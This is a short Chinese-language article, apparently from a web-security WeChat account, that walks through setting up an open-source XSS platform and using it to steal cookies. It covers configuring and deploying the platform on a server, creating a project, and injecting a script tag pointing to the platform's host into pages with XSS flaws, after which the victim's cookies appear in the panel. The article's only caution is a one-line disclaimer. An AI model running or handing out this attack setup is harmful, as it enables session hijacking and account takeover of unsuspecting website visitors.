本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
男孩子要娶,就要娶一见你就笑的女生,女孩子要嫁就要嫁能让你笑的男生。。。
---- 网易云热评
一、下载平台源码、拷贝到我们网站的根目录
https://github.com/anwilx/xss_platform
二、修改相关参数
1、config.php,数据库用户、密码、还有 xss 平台的访问路径
2、导入 sql 文件,测试的时候没法导入,所以就手动创建了数据库
新建数据库
打开 xssplatform.sql,将里面的 sql 语句执行一遍
3、更新站点域名,将作者的域名替换,一共有四处
将 module 模块里 "http://xsser.me" 替换为 "http://www.aiyouxss.com/xss");
4、修改 authtest 文件
三、平台利用
1、注册一个账户
2、创建一个项目
3、配置相关信息,根据需要,添加模块
4、复制 script 里面代码,插入到存在 xss 漏洞的页面
<script src=http://192.168.139.129/xss/E3vbsa></script>
5、打开 xss 平台,已获取对方 cookie
禁止非法,后果自负
欢迎关注公众号:web 安全工具库
欢迎关注视频号:之乎者也吧